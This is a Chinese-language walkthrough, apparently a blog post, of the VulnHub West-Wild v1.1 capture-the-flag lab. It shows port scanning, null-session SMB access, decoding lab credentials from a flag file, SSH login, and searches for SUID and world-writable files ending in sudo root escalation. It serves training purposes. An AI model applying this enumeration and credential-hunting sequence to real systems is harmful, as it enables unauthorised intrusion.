West-Wild-v1.1靶机渗透测试

一、靶机下载地址

https://www.vulnhub.com/entry/westwild-11,338/

二、信息收集

1、靶机给出IP地址

2、端口扫描

# 使用命令
nmap 192.168.145.207 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.207

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.207"

三、获取shell

1、访问靶机IP地址

2、80端口没什么发现,从139和445这两个smb服务入手,枚举用户、查找共享文件夹,这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功

# 使用命令
enum4linux 192.168.145.207

smbclient //192.168.145.207/wave

3、查看当前目录下文件,看到一个 flag.txt ,下载下来查看,得到一串加密字符

# 使用命令 
cat FLAG1.txt

RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

4、base64解码,得到 flag 1 ,以及一个账号密码

user:wavex
password:door+open

5、使用ssh进行连接,连接成功

# 使用命令
ssh wavex@192.168.145.207

四、提权

1、查看当前权限,发现suid、sudo等都没有可利用的

# 使用命令
sudo -l

find / -user root -perm -4000 -print 2>/dev/null

2、在home目录下看到还有一个用户 aveng

# 使用命令
cd /home

3、两个用户目录找了找,没看到啥东西,也没有计划任务,passwd没有写入权限,查看有没有可写文件

# 使用命令
find  / -perm 0777 -type f 2>/dev/null

4、查看文件内容,得到 aveng 用户的密码

# 使用命令
cat /usr/share/av/westsidesecret/ififoregt.sh

aveng:kaizen+80

5、切换用户到 aveng

# 使用命令
su aveng

6、查看当前权限

# 使用命令
sudo -l

7、显示为 all ,直接 sudo su 提权,提权成功

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值